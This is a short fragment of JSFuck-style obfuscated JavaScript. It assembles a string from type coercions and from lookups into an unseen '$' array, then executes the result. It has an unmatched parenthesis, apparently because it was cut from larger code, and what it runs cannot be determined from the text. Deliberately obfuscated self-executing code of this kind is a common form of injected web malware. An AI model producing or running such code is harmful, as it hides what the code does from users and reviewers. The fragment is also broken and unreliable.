(!![]+[])[!+[]+!+[]+!+[]]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[28]+$[13]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+$[45]+$[47]+$[29]+$[29]+$[29]+$[29]+$[29]+$[29]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+$[45]+$[29]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+$[24]+$[45]+$[29]+$[5]+$[35]+$[48]+$[34]+$[36]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+$[48]+$[9]+$[6]+$[49])();